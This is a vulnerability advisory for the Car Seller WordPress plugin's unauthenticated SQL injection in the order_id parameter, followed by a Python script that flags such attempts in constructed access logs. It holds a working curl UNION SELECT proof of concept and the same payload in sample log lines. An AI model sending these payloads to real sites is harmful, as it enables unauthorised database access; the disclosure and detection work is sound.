wpvulndb WPEX-ID: F35D6AB7-DD52-48B3-A79C-3F89EDF24162
Published: Apr 26, 2021

Car Seller - Auto Classifieds Script <= 2.1.0 - Unauthenticated SQL Injection

Source: wpvulndb
Tags: car seller, auto classifieds, unauthenticated sql injection

EPSS: 0.147 (percentile 95.9%)

The request_list_request AJAX call of the plugin, reachable by both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to an unauthenticated SQL Injection issue.

curl 'https://example.com/wp-admin/admin-ajax.php' \
  --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \
  --compressed \
  --insecure
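A defender-side check for this issue, added here as an example and not part of the advisory or the plugin: it scans constructed access-log lines (the log format, with POST bodies recorded, is an assumption) and flags request_list_request calls whose order_id is anything other than a plain integer, which is all the parameter should ever be.

```python
"""Heuristic detection for abuse of the request_list_request order_id parameter.

Assumes a proxy/WAF log that records POST bodies, one request per line:
    <client_ip> POST <path> <urlencoded body>
The log lines below are constructed for this example.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

TARGET_ACTION = "request_list_request"
# order_id is a row identifier: an optional sign followed by digits is all that is legitimate.
INT_RE = re.compile(r"^-?\d+$")
# Common SQL keywords and comment markers seen in injection attempts.
SQLI_HINT = re.compile(r"\b(union|select|sleep|benchmark)\b|--|/\*", re.IGNORECASE)

# Constructed sample log (hypothetical IPs from documentation ranges).
SAMPLE_LOG = [
    "203.0.113.5 POST /wp-admin/admin-ajax.php action=request_list_request&order_id=42",
    "203.0.113.9 POST /wp-admin/admin-ajax.php "
    "action=request_list_request&order_id=-1662+UNION+ALL+SELECT+NULL%2Ccurrent_user()--+-",
    "198.51.100.7 POST /wp-admin/admin-ajax.php action=heartbeat&_nonce=abc",
    "203.0.113.9 POST /wp-admin/admin-ajax.php action=request_list_request&order_id=1%27",
]


def classify(body: str) -> Optional[str]:
    """Return 'benign', 'sqli' or 'malformed' for a request_list_request body, else None."""
    params = parse_qs(body, keep_blank_values=True)  # decodes %XX and '+' like PHP does
    if params.get("action", [""])[0] != TARGET_ACTION:
        return None
    order_id = params.get("order_id", [""])[0]
    if INT_RE.fullmatch(order_id):
        return "benign"
    if SQLI_HINT.search(order_id):
        return "sqli"
    return "malformed"  # not an integer, but no obvious SQL: still worth a look


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, verdict, decoded order_id) for every non-benign hit."""
    hits = []
    for line in lines:
        client_ip, _method, _path, body = line.split(" ", 3)
        verdict = classify(body)
        if verdict in ("sqli", "malformed"):
            order_id = parse_qs(body, keep_blank_values=True).get("order_id", [""])[0]
            hits.append((client_ip, verdict, order_id))
    return hits
```

Detection is a stop-gap only; the fix is to cast order_id to an integer or pass it through a prepared statement before it reaches the query.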
